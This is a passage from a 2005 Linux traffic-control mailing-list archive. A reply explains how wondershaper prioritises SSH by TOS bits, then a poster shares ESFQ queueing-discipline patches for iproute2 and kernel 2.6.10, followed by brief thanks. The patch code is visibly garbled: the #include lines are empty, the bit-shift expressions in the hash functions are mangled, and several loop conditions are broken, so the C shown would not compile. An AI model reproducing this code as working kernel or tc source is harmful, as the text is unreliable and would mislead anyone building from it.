mentioning SSH as a big winner.=20 > >however, looking through the script i can't really tell just *how*=20 > >wondershaper figures out which port my SSH daemon is running on.=20 > > > >so what i'd like to know is, if i'm running my sshd on, say, port 222,= =20 > >do i need to make any changes to the wondershaper script, or will it=20 > >figure out the right number automagically (e.g. from /etc/services,=20 > >where SSH is already correctly assigned to port 222) ? > >(conversely, does it 'need' to figure out this port number at all?) > >=20 > > >=20 > It's been a while since I looked through wondershaper, but the relevant= =20 > lines are apparently these: >=20 > # TOS Minimum Delay (ssh, NOT scp) in 1:10: >=20 > tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 \ > match ip tos 0x10 0xff flowid 1:10 >=20 > So it seems to be matching based on the "type of service" bits in the IP= =20 > packet. I seem to remember that SSH actually sets the IP tos bits=20 > correctly? >=20 > So it *should* work when ssh is on another port. I guess you need to=20 > either tweak the script (if you want a quick fix then just mark anything= =20 > to/from port 222 as high priority), or else figure out why your packets= =20 > aren't matching the required rule.... >=20 > Good luck >=20 > Ed W --r5Pyd7+fXNt84Ff3 Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: http://www.gnupg.org iD8DBQFB4+XeDCKFvpZK6O4RApsbAJ9lwxx127ZgCIH/GKF1YyteaayTGgCeMk2I e1O6c9n9DDpi7+YP1fq1gEU= =NQI4 -----END PGP SIGNATURE----- --r5Pyd7+fXNt84Ff3-- From andy.furniss@dsl.pipex.com Tue Jan 11 15:28:08 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 11 Jan 2005 15:28:08 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <41DBA952.5010203@expertron.co.za> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> Message-ID: <41E3F088.6060708@dsl.pipex.com> This is a multi-part message in MIME format. --------------010108080506010705020509 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Justin Schoeman wrote: > Woohoo - that would be great! > > -justin > > Andy Furniss wrote: > >> Justin Schoeman wrote: >> >>> Ouch... Is there any other way to do host-based fair sharing (well, >>> other than actually classifying each host :-( )? >> >> >> >> I don't think it will take much to get it to work - though I haven't >> tried :-) . >> >> I'll have a look at doing a 2.6.10 in the next few days. Well I gave it a go (first patches I've made) and they work for me though Thomas or Stephen may notice something :-) . Hopefully they won't be needed in the future if Thomas gets esfq in mainline. They are based on Alexander Clouters patches at www.digriz.org.uk. I only used the first iproute one. I was hampered a bit because kernel.org have turned off the diff viewer. The remove db iproute patch is from LFS, you may not need it if you have Berkley DB installed ( search for db_185.h ). If you don't have it *and* you don't use arpd then use the patch, it just removes arpd from the build. Andy. --------------010108080506010705020509 Content-Type: text/plain; name="esfq-iproute2-2.6.9-041019.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="esfq-iproute2-2.6.9-041019.patch" diff -urN iproute2-2.6.9.orig/include/linux/pkt_sched.h iproute2-2.6.9/include/linux/pkt_sched.h --- iproute2-2.6.9.orig/include/linux/pkt_sched.h 2004-10-19 21:49:02.000000000 +0100 +++ iproute2-2.6.9/include/linux/pkt_sched.h 2005-01-11 11:46:45.395401296 +0000 @@ -126,6 +126,13 @@ /* SFQ section */ +enum +{ + TCA_SFQ_HASH_CLASSIC, + TCA_SFQ_HASH_DST, + TCA_SFQ_HASH_SRC, +}; + struct tc_sfq_qopt { unsigned quantum; /* Bytes per round allocated to flow */ @@ -133,6 +140,7 @@ __u32 limit; /* Maximal packets in queue */ unsigned divisor; /* Hash divisor */ unsigned flows; /* Maximal number of flows */ + unsigned hash_kind; /* Hash function to use for flow identification */ }; /* @@ -142,6 +150,8 @@ * * The only reason for this is efficiency, it is possible * to change these parameters in compile time. + * + * If you need to play with this values use esfq */ /* RED section */ diff -urN iproute2-2.6.9.orig/tc/Makefile iproute2-2.6.9/tc/Makefile --- iproute2-2.6.9.orig/tc/Makefile 2004-10-19 21:49:02.000000000 +0100 +++ iproute2-2.6.9/tc/Makefile 2005-01-11 11:46:45.396401144 +0000 @@ -6,6 +6,7 @@ TCMODULES := TCMODULES += q_fifo.o TCMODULES += q_sfq.o +TCMODULES += q_esfq.o TCMODULES += q_red.o TCMODULES += q_prio.o TCMODULES += q_tbf.o diff -urN iproute2-2.6.9.orig/tc/q_esfq.c iproute2-2.6.9/tc/q_esfq.c --- iproute2-2.6.9.orig/tc/q_esfq.c 1970-01-01 01:00:00.000000000 +0100 +++ iproute2-2.6.9/tc/q_esfq.c 2005-01-11 11:47:29.424707824 +0000 @@ -0,0 +1,168 @@ +/* + * q_esfq.c ESFQ. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + * + * Authors: Alexey Kuznetsov, + * + * Changes: Alexander Atanasov, + * Added depth,limit,divisor,hash_kind options. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "utils.h" +#include "tc_util.h" + +static void explain(void) +{ + fprintf(stderr, "Usage: ... esfq [ perturb SECS ] [ quantum BYTES ] [ depth FLOWS ]\n\t[ divisor HASHBITS ] [ limit PKTS ] [ hash HASHTYPE]\n"); + fprintf(stderr,"Where: \n"); + fprintf(stderr,"HASHTYPE := { classic | src | dst }\n"); +} + +#define usage() return(-1) + +static int esfq_parse_opt(struct qdisc_util *qu, int argc, char **argv, struct nlmsghdr *n) +{ + int ok=0; + struct tc_sfq_qopt opt; + + memset(&opt, 0, sizeof(opt)); + + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; + + while (argc > 0) { + if (strcmp(*argv, "quantum") == 0) { + NEXT_ARG(); + if (get_size(&opt.quantum, *argv)) { + fprintf(stderr, "Illegal \"quantum\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "perturb") == 0) { + NEXT_ARG(); + if (get_integer(&opt.perturb_period, *argv, 0)) { + fprintf(stderr, "Illegal \"perturb\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "depth") == 0) { + NEXT_ARG(); + if (get_integer(&opt.flows, *argv, 0)) { + fprintf(stderr, "Illegal \"depth\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "divisor") == 0) { + NEXT_ARG(); + if (get_integer(&opt.divisor, *argv, 0)) { + fprintf(stderr, "Illegal \"divisor\"\n"); + return -1; + } + if(opt.divisor >= 15) { + fprintf(stderr, "Illegal \"divisor\" must be < 15\n"); + return -1; + } + opt.divisor=pow(2,opt.divisor); + ok++; + } else if (strcmp(*argv, "limit") == 0) { + NEXT_ARG(); + if (get_integer(&opt.limit, *argv, 0)) { + fprintf(stderr, "Illegal \"limit\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "hash") == 0) { + NEXT_ARG(); + if(strcmp(*argv,"classic") == 0) { + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; + } else + if(strcmp(*argv,"dst") == 0) { + opt.hash_kind= TCA_SFQ_HASH_DST; + } else + if(strcmp(*argv,"src") == 0) { + opt.hash_kind= TCA_SFQ_HASH_SRC; + } else { + fprintf(stderr, "Illegal \"hash\"\n"); + explain(); + return -1; + } + ok++; + } else if (strcmp(*argv, "help") == 0) { + explain(); + return -1; + } else { + fprintf(stderr, "What is \"%s\"?\n", *argv); + explain(); + return -1; + } + argc--; argv++; + } + + if (ok) + addattr_l(n, 1024, TCA_OPTIONS, &opt, sizeof(opt)); + return 0; +} + +static int esfq_print_opt(struct qdisc_util *qu, FILE *f, struct rtattr *opt) +{ + struct tc_sfq_qopt *qopt; + SPRINT_BUF(b1); + + if (opt == NULL) + return 0; + + if (RTA_PAYLOAD(opt) < sizeof(*qopt)) + return -1; + qopt = RTA_DATA(opt); + fprintf(f, "quantum %s ", sprint_size(qopt->quantum, b1)); + if (show_details) { + fprintf(f, "limit %up flows %u/%u ", + qopt->limit, qopt->flows, qopt->divisor); + } + if (qopt->perturb_period) + fprintf(f, "perturb %dsec ", qopt->perturb_period); + + fprintf(f,"hash: "); + switch(qopt->hash_kind) + { + case TCA_SFQ_HASH_CLASSIC: + fprintf(f,"classic"); + break; + case TCA_SFQ_HASH_DST: + fprintf(f,"dst"); + break; + case TCA_SFQ_HASH_SRC: + fprintf(f,"src"); + break; + default: + fprintf(f,"Unknown"); + } + return 0; +} + +static int esfq_print_xstats(struct qdisc_util *qu, FILE *f, struct rtattr *xstats) +{ + return 0; +} + + +struct qdisc_util esfq_qdisc_util = { + .id = "esfq", + .parse_qopt = esfq_parse_opt, + .print_qopt = esfq_print_opt, + .print_xstats = esfq_print_xstats, +}; --------------010108080506010705020509 Content-Type: text/plain; name="esfq-kernel-2.6.10.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="esfq-kernel-2.6.10.patch" diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h --- linux-2.6.10.orig/include/linux/pkt_sched.h Fri Dec 24 21:35:23 2004 +++ linux-2.6.10/include/linux/pkt_sched.h Mon Jan 10 15:32:43 2005 @@ -129,6 +129,13 @@ /* SFQ section */ +enum +{ + TCA_SFQ_HASH_CLASSIC, + TCA_SFQ_HASH_DST, + TCA_SFQ_HASH_SRC, +}; + struct tc_sfq_qopt { unsigned quantum; /* Bytes per round allocated to flow */ @@ -136,6 +143,7 @@ __u32 limit; /* Maximal packets in queue */ unsigned divisor; /* Hash divisor */ unsigned flows; /* Maximal number of flows */ + unsigned hash_kind; /* Hash function to use for flow identification */ }; /* @@ -145,6 +153,8 @@ * * The only reason for this is efficiency, it is possible * to change these parameters in compile time. + * + * If you need to play with this values use esfq. */ /* RED section */ diff -urN linux-2.6.10.orig/net/sched/Kconfig linux-2.6.10/net/sched/Kconfig --- linux-2.6.10.orig/net/sched/Kconfig Fri Dec 24 21:35:27 2004 +++ linux-2.6.10/net/sched/Kconfig Mon Jan 10 15:32:43 2005 @@ -154,6 +154,24 @@ To compile this code as a module, choose M here: the module will be called sch_sfq. +config NET_SCH_ESFQ + tristate "ESFQ queue" + depends on NET_SCHED + ---help--- + Say Y here if you want to use the Enhanced Stochastic Fairness + Queueing (ESFQ) packet scheduling algorithm for some of your network + devices or as a leaf discipline for the CBQ scheduling algorithm (see + the top of for details and references + about the SFQ algorithm). + + This is an enchanced SFQ version which allows you to control the + hardcoded values in the SFQ scheduler: queue depth, hash table size, + queues limit. Also adds control to the hash function used to identify + packet flows. Hash by src or dst ip and original sfq hash. + + To compile this code as a module, choose M here: the + module will be called sch_esfq. + config NET_SCH_TEQL tristate "TEQL queue" depends on NET_SCHED diff -urN linux-2.6.10.orig/net/sched/Makefile linux-2.6.10/net/sched/Makefile --- linux-2.6.10.orig/net/sched/Makefile Fri Dec 24 21:34:45 2004 +++ linux-2.6.10/net/sched/Makefile Mon Jan 10 15:32:43 2005 @@ -22,6 +22,7 @@ obj-$(CONFIG_NET_SCH_INGRESS) += sch_ingress.o obj-$(CONFIG_NET_SCH_DSMARK) += sch_dsmark.o obj-$(CONFIG_NET_SCH_SFQ) += sch_sfq.o +obj-$(CONFIG_NET_SCH_ESFQ) += sch_esfq.o obj-$(CONFIG_NET_SCH_TBF) += sch_tbf.o obj-$(CONFIG_NET_SCH_TEQL) += sch_teql.o obj-$(CONFIG_NET_SCH_PRIO) += sch_prio.o diff -urN linux-2.6.10.orig/net/sched/sch_esfq.c linux-2.6.10/net/sched/sch_esfq.c --- linux-2.6.10.orig/net/sched/sch_esfq.c Thu Jan 1 01:00:00 1970 +++ linux-2.6.10/net/sched/sch_esfq.c Mon Jan 10 22:40:09 2005 @@ -0,0 +1,585 @@ +/* + * net/sched/sch_esfq.c Extended Stochastic Fairness Queueing discipline. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + * + * Authors: Alexey Kuznetsov, + * + * Changes: Alexander Atanasov, + * Added dynamic depth,limit,divisor,hash_kind options. + * Added dst and src hashes. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* Stochastic Fairness Queuing algorithm. + For more comments look at sch_sfq.c. + The difference is that you can change limit, depth, + hash table size and choose 3 hash types. + + classic: same as in sch_sfq.c + dst: destination IP address + src: source IP address + + TODO: + make sfq_change work. +*/ + + +/* This type should contain at least SFQ_DEPTH*2 values */ +typedef unsigned int esfq_index; + +struct esfq_head +{ + esfq_index next; + esfq_index prev; +}; + +struct esfq_sched_data +{ +/* Parameters */ + int perturb_period; + unsigned quantum; /* Allotment per round: MUST BE >= MTU */ + int limit; + unsigned depth; + unsigned hash_divisor; + unsigned hash_kind; +/* Variables */ + struct timer_list perturb_timer; + int perturbation; + esfq_index tail; /* Index of current slot in round */ + esfq_index max_depth; /* Maximal depth */ + + esfq_index *ht; /* Hash table */ + esfq_index *next; /* Active slots link */ + short *allot; /* Current allotment per slot */ + unsigned short *hash; /* Hash value indexed by slots */ + struct sk_buff_head *qs; /* Slot queue */ + struct esfq_head *dep; /* Linked list of slots, indexed by depth */ +}; + +static __inline__ unsigned esfq_hash_u32(struct esfq_sched_data *q,u32 h) +{ + int pert = q->perturbation; + + if (pert) + h = (h<>(0x1F - pert)); + + h = ntohl(h) * 2654435761UL; + return h & (q->hash_divisor-1); +} + +static __inline__ unsigned esfq_fold_hash_classic(struct esfq_sched_data *q, u32 h, u32 h1) +{ + int pert = q->perturbation; + + /* Have we any rotation primitives? If not, WHY? */ + h ^= (h1<>(0x1F - pert)); + h ^= h>>10; + return h & (q->hash_divisor-1); +} + +static unsigned esfq_hash(struct esfq_sched_data *q, struct sk_buff *skb) +{ + u32 h, h2; + u32 hs; + + switch (skb->protocol) { + case __constant_htons(ETH_P_IP): + { + struct iphdr *iph = skb->nh.iph; + h = iph->daddr; + hs = iph->saddr; + h2 = hs^iph->protocol; + if (!(iph->frag_off&htons(IP_MF|IP_OFFSET)) && + (iph->protocol == IPPROTO_TCP || + iph->protocol == IPPROTO_UDP || + iph->protocol == IPPROTO_ESP)) + h2 ^= *(((u32*)iph) + iph->ihl); + break; + } + case __constant_htons(ETH_P_IPV6): + { + struct ipv6hdr *iph = skb->nh.ipv6h; + h = iph->daddr.s6_addr32[3]; + hs = iph->saddr.s6_addr32[3]; + h2 = hs^iph->nexthdr; + if (iph->nexthdr == IPPROTO_TCP || + iph->nexthdr == IPPROTO_UDP || + iph->nexthdr == IPPROTO_ESP) + h2 ^= *(u32*)&iph[1]; + break; + } + default: + h = (u32)(unsigned long)skb->dst; + hs = (u32)(unsigned long)skb->sk; + h2 = hs^skb->protocol; + } + switch(q->hash_kind) + { + case TCA_SFQ_HASH_CLASSIC: + return esfq_fold_hash_classic(q, h, h2); + case TCA_SFQ_HASH_DST: + return esfq_hash_u32(q,h); + case TCA_SFQ_HASH_SRC: + return esfq_hash_u32(q,hs); + default: + if (net_ratelimit()) + printk(KERN_DEBUG "esfq unknown hash method, fallback to classic\n"); + } + return esfq_fold_hash_classic(q, h, h2); +} + +static inline void esfq_link(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + int d = q->qs[x].qlen + q->depth; + + p = d; + n = q->dep[d].next; + q->dep[x].next = n; + q->dep[x].prev = p; + q->dep[p].next = q->dep[n].prev = x; +} + +static inline void esfq_dec(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + + n = q->dep[x].next; + p = q->dep[x].prev; + q->dep[p].next = n; + q->dep[n].prev = p; + + if (n == p && q->max_depth == q->qs[x].qlen + 1) + q->max_depth--; + + esfq_link(q, x); +} + +static inline void esfq_inc(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + int d; + + n = q->dep[x].next; + p = q->dep[x].prev; + q->dep[p].next = n; + q->dep[n].prev = p; + d = q->qs[x].qlen; + if (q->max_depth < d) + q->max_depth = d; + + esfq_link(q, x); +} + +static unsigned int esfq_drop(struct Qdisc *sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + esfq_index d = q->max_depth; + struct sk_buff *skb; + unsigned int len; + + /* Queue is full! Find the longest slot and + drop a packet from it */ + + if (d > 1) { + esfq_index x = q->dep[d+q->depth].next; + skb = q->qs[x].prev; + len = skb->len; + __skb_unlink(skb, &q->qs[x]); + kfree_skb(skb); + esfq_dec(q, x); + sch->q.qlen--; + sch->qstats.drops++; + return len; + } + + if (d == 1) { + /* It is difficult to believe, but ALL THE SLOTS HAVE LENGTH 1. */ + d = q->next[q->tail]; + q->next[q->tail] = q->next[d]; + q->allot[q->next[d]] += q->quantum; + skb = q->qs[d].prev; + len = skb->len; + __skb_unlink(skb, &q->qs[d]); + kfree_skb(skb); + esfq_dec(q, d); + sch->q.qlen--; + q->ht[q->hash[d]] = q->depth; + sch->qstats.drops++; + return len; + } + + return 0; +} + +static int +esfq_enqueue(struct sk_buff *skb, struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned hash = esfq_hash(q, skb); + unsigned depth = q->depth; + esfq_index x; + + x = q->ht[hash]; + if (x == depth) { + q->ht[hash] = x = q->dep[depth].next; + q->hash[x] = hash; + } + __skb_queue_tail(&q->qs[x], skb); + esfq_inc(q, x); + if (q->qs[x].qlen == 1) { /* The flow is new */ + if (q->tail == depth) { /* It is the first flow */ + q->tail = x; + q->next[x] = x; + q->allot[x] = q->quantum; + } else { + q->next[x] = q->next[q->tail]; + q->next[q->tail] = x; + q->tail = x; + } + } + if (++sch->q.qlen < q->limit-1) { + sch->bstats.bytes += skb->len; + sch->bstats.packets++; + return 0; + } + + esfq_drop(sch); + return NET_XMIT_CN; +} + +static int +esfq_requeue(struct sk_buff *skb, struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned hash = esfq_hash(q, skb); + unsigned depth = q->depth; + esfq_index x; + + x = q->ht[hash]; + if (x == depth) { + q->ht[hash] = x = q->dep[depth].next; + q->hash[x] = hash; + } + __skb_queue_head(&q->qs[x], skb); + esfq_inc(q, x); + if (q->qs[x].qlen == 1) { /* The flow is new */ + if (q->tail == depth) { /* It is the first flow */ + q->tail = x; + q->next[x] = x; + q->allot[x] = q->quantum; + } else { + q->next[x] = q->next[q->tail]; + q->next[q->tail] = x; + q->tail = x; + } + } + if (++sch->q.qlen < q->limit - 1) { + sch->qstats.requeues++; + return 0; + } + + sch->qstats.drops++; + esfq_drop(sch); + return NET_XMIT_CN; +} + + + + +static struct sk_buff * +esfq_dequeue(struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct sk_buff *skb; + unsigned depth = q->depth; + esfq_index a, old_a; + + /* No active slots */ + if (q->tail == depth) + return NULL; + + a = old_a = q->next[q->tail]; + + /* Grab packet */ + skb = __skb_dequeue(&q->qs[a]); + esfq_dec(q, a); + sch->q.qlen--; + + /* Is the slot empty? */ + if (q->qs[a].qlen == 0) { + q->ht[q->hash[a]] = depth; + a = q->next[a]; + if (a == old_a) { + q->tail = depth; + return skb; + } + q->next[q->tail] = a; + q->allot[a] += q->quantum; + } else if ((q->allot[a] -= skb->len) <= 0) { + q->tail = a; + a = q->next[a]; + q->allot[a] += q->quantum; + } + + return skb; +} + +static void +esfq_reset(struct Qdisc* sch) +{ + struct sk_buff *skb; + + while ((skb = esfq_dequeue(sch)) != NULL) + kfree_skb(skb); +} + +static void esfq_perturbation(unsigned long arg) +{ + struct Qdisc *sch = (struct Qdisc*)arg; + struct esfq_sched_data *q = qdisc_priv(sch); + + q->perturbation = net_random()&0x1F; + q->perturb_timer.expires = jiffies + q->perturb_period; + + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } +} + +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct tc_sfq_qopt *ctl = RTA_DATA(opt); + int old_perturb = q->perturb_period; + + if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) + return -EINVAL; + + sch_tree_lock(sch); + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); + q->perturb_period = ctl->perturb_period*HZ; +// q->hash_divisor = ctl->divisor; +// q->tail = q->limit = q->depth = ctl->flows; + + if (ctl->limit) + q->limit = min_t(u32, ctl->limit, q->depth); + + if (ctl->hash_kind) { + q->hash_kind = ctl->hash_kind; + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) + q->perturb_period = 0; + } + + // is sch_tree_lock enough to do this ? + while (sch->q.qlen >= q->limit-1) + esfq_drop(sch); + + if (old_perturb) + del_timer(&q->perturb_timer); + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } else { + q->perturbation = 0; + } + sch_tree_unlock(sch); + return 0; +} + +static int esfq_init(struct Qdisc *sch, struct rtattr *opt) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct tc_sfq_qopt *ctl; + esfq_index p = ~0UL/2; + int i; + + if (opt && opt->rta_len < RTA_LENGTH(sizeof(*ctl))) + return -EINVAL; + + init_timer(&q->perturb_timer); + q->perturb_timer.data = (unsigned long)sch; + q->perturb_timer.function = esfq_perturbation; + q->perturbation = 0; + q->hash_kind = TCA_SFQ_HASH_CLASSIC; + q->max_depth = 0; + if (opt == NULL) { + q->quantum = psched_mtu(sch->dev); + q->perturb_period = 0; + q->hash_divisor = 1024; + q->tail = q->limit = q->depth = 128; + + } else { + ctl = RTA_DATA(opt); + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); + q->perturb_period = ctl->perturb_period*HZ; + q->hash_divisor = ctl->divisor ? : 1024; + q->tail = q->limit = q->depth = ctl->flows ? : 128; + + if ( q->depth > p - 1 ) + return -EINVAL; + + if (ctl->limit) + q->limit = min_t(u32, ctl->limit, q->depth); + + if (ctl->hash_kind) { + q->hash_kind = ctl->hash_kind; + } + + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } + } + + q->ht = kmalloc(q->hash_divisor*sizeof(esfq_index), GFP_KERNEL); + if (!q->ht) + goto err_case; + + q->dep = kmalloc((1+q->depth*2)*sizeof(struct esfq_head), GFP_KERNEL); + if (!q->dep) + goto err_case; + q->next = kmalloc(q->depth*sizeof(esfq_index), GFP_KERNEL); + if (!q->next) + goto err_case; + + q->allot = kmalloc(q->depth*sizeof(short), GFP_KERNEL); + if (!q->allot) + goto err_case; + q->hash = kmalloc(q->depth*sizeof(unsigned short), GFP_KERNEL); + if (!q->hash) + goto err_case; + q->qs = kmalloc(q->depth*sizeof(struct sk_buff_head), GFP_KERNEL); + if (!q->qs) + goto err_case; + + for (i=0; i< q->hash_divisor; i++) + q->ht[i] = q->depth; + for (i=0; idepth; i++) { + skb_queue_head_init(&q->qs[i]); + q->dep[i+q->depth].next = i+q->depth; + q->dep[i+q->depth].prev = i+q->depth; + } + + for (i=0; idepth; i++) + esfq_link(q, i); + return 0; +err_case: + if (q->ht) + kfree(q->ht); + if (q->dep) + kfree(q->dep); + if (q->next) + kfree(q->next); + if (q->allot) + kfree(q->allot); + if (q->hash) + kfree(q->hash); + if (q->qs) + kfree(q->qs); + return -ENOBUFS; +} + +static void esfq_destroy(struct Qdisc *sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + del_timer(&q->perturb_timer); + if(q->ht) + kfree(q->ht); + if(q->dep) + kfree(q->dep); + if(q->next) + kfree(q->next); + if(q->allot) + kfree(q->allot); + if(q->hash) + kfree(q->hash); + if(q->qs) + kfree(q->qs); +} + +static int esfq_dump(struct Qdisc *sch, struct sk_buff *skb) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned char *b = skb->tail; + struct tc_sfq_qopt opt; + + opt.quantum = q->quantum; + opt.perturb_period = q->perturb_period/HZ; + + opt.limit = q->limit; + opt.divisor = q->hash_divisor; + opt.flows = q->depth; + opt.hash_kind = q->hash_kind; + + RTA_PUT(skb, TCA_OPTIONS, sizeof(opt), &opt); + + return skb->len; + +rtattr_failure: + skb_trim(skb, b - skb->data); + return -1; +} + +static struct Qdisc_ops esfq_qdisc_ops = +{ + .next = NULL, + .cl_ops = NULL, + .id = "esfq", + .priv_size = sizeof(struct esfq_sched_data), + .enqueue = esfq_enqueue, + .dequeue = esfq_dequeue, + .requeue = esfq_requeue, + .drop = esfq_drop, + .init = esfq_init, + .reset = esfq_reset, + .destroy = esfq_destroy, + .change = NULL, /* esfq_change - needs more work */ + .dump = esfq_dump, + .owner = THIS_MODULE, +}; + +static int __init esfq_module_init(void) +{ + return register_qdisc(&esfq_qdisc_ops); +} +static void __exit esfq_module_exit(void) +{ + unregister_qdisc(&esfq_qdisc_ops); +} +module_init(esfq_module_init) +module_exit(esfq_module_exit) +MODULE_LICENSE("GPL"); --------------010108080506010705020509 Content-Type: text/plain; name="iproute2-2.6.9_041019-remove_db-1.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="iproute2-2.6.9_041019-remove_db-1.patch" Submitted By: Jeremy Utley Date: 2004-11-04 Initial Package Version: 2.6.9-041019 Upstream Status - Not submitted - LFS Specific Origin: Based on inital work by Jim Gifford, ported to apply to the latest version Description: Disables compilation of the arpd program, which requres Berkley DB. diff -Naur iproute2-2.6.9/misc/Makefile iproute2-2.6.9-new/misc/Makefile --- iproute2-2.6.9/misc/Makefile 2004-10-19 20:49:02.000000000 +0000 +++ iproute2-2.6.9-new/misc/Makefile 2004-11-04 19:14:43.704002010 +0000 @@ -1,7 +1,7 @@ SSOBJ=ss.o ssfilter.o LNSTATOBJ=lnstat.o lnstat_util.o -TARGETS=ss nstat ifstat rtacct arpd lnstat +TARGETS=ss nstat ifstat rtacct lnstat include ../Config @@ -18,9 +18,6 @@ rtacct: rtacct.c $(CC) $(CFLAGS) $(LDFLAGS) -o rtacct rtacct.c $(LIBNETLINK) -lm -arpd: arpd.c - $(CC) $(CFLAGS) -I$(DBM_INCLUDE) $(LDFLAGS) -o arpd arpd.c $(LIBNETLINK) -ldb -lpthread - ssfilter.c: ssfilter.y bison ssfilter.y -o ssfilter.c --------------010108080506010705020509-- From CARRIGB@ITCARLOW.IE Tue Jan 11 15:33:59 2005 From: CARRIGB@ITCARLOW.IE (Brian Carrig) Date: Tue, 11 Jan 2005 15:33:59 -0000 Subject: [LARTC] ESFQ? In-Reply-To: <41E3F088.6060708@dsl.pipex.com> References: <41DBA952.5010203@expertron.co.za> Message-ID: <41E3F1E7.20214.1145005@ITCARLOW.IE> Cheers Andy, great work. Brian On 11 Jan 2005 at 15:28, Andy Furniss wrote: > Justin Schoeman wrote: > > Woohoo - that would be great! > > > > -justin > > > > Andy Furniss wrote: > > > >> Justin Schoeman wrote: > >> > >>> Ouch... Is there any other way to do host-based fair sharing > >>> (well, other than actually classifying each host :-( )? > >> > >> > >> > >> I don't think it will take much to get it to work - though I > >> haven't tried :-) . > >> > >> I'll have a look at doing a 2.6.10 in the next few days. > > Well I gave it a go (first patches I've made) and they work for me > though Thomas or Stephen may notice something :-) . > > Hopefully they won't be needed in the future if Thomas gets esfq in > mainline. > > They are based on Alexander Clouters patches at www.digriz.org.uk. I > only used the first iproute one. > > I was hampered a bit because kernel.org have turned off the diff > viewer. > > The remove db iproute patch is from LFS, you may not need it if you > have Berkley DB installed ( search for db_185.h ). > > If you don't have it *and* you don't use arpd then use the patch, it > just removes arpd from the build. > > Andy. > > > -- Brian Carrig Research Assistant Department of Computing & Networking Institute of Technology, Carlow Tel. No.: +353 59 9176314 From justin@expertron.co.za Tue Jan 11 15:51:26 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Tue, 11 Jan 2005 17:51:26 +0200 Subject: [LARTC] ESFQ? In-Reply-To: <41E3F088.6060708@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> Message-ID: <41E3F5FE.3000703@expertron.co.za> Thanks - really appreciate the help! -justin Andy Furniss wrote: > Justin Schoeman wrote: > >> Woohoo - that would be great! >> >> -justin >> >> Andy Furniss wrote: >> >>> Justin Schoeman wrote: >>> >>>> Ouch... Is there any other way to do host-based fair sharing (well, >>>> other than actually classifying each host :-( )? >>> >>> >>> >>> >>> I don't think it will take much to get it to work - though I haven't >>> tried :-) . >>> >>> I'll have a look at doing a 2.6.10 in the next few days. > > > Well I gave it a go (first patches I've made) and they work for me > though Thomas or Stephen may notice something :-) . > > Hopefully they won't be needed in the future if Thomas gets esfq in > mainline. > > They are based on Alexander Clouters patches at www.digriz.org.uk. I > only used the first iproute one. > > I was hampered a bit because kernel.org have turned off the diff viewer. > > The remove db iproute patch is from LFS, you may not need it if you have > Berkley DB installed ( search for db_185.h ). > > If you don't have it *and* you don't use arpd then use the patch, it > just removes arpd from the build. > > Andy. > > > > ------------------------------------------------------------------------ > > diff -urN iproute2-2.6.9.orig/include/linux/pkt_sched.h iproute2-2.6.9/include/linux/pkt_sched.h > --- iproute2-2.6.9.orig/include/linux/pkt_sched.h 2004-10-19 21:49:02.000000000 +0100 > +++ iproute2-2.6.9/include/linux/pkt_sched.h 2005-01-11 11:46:45.395401296 +0000 > @@ -126,6 +126,13 @@ > > /* SFQ section */ > > +enum > +{ > + TCA_SFQ_HASH_CLASSIC, > + TCA_SFQ_HASH_DST, > + TCA_SFQ_HASH_SRC, > +}; > + > struct tc_sfq_qopt > { > unsigned quantum; /* Bytes per round allocated to flow */ > @@ 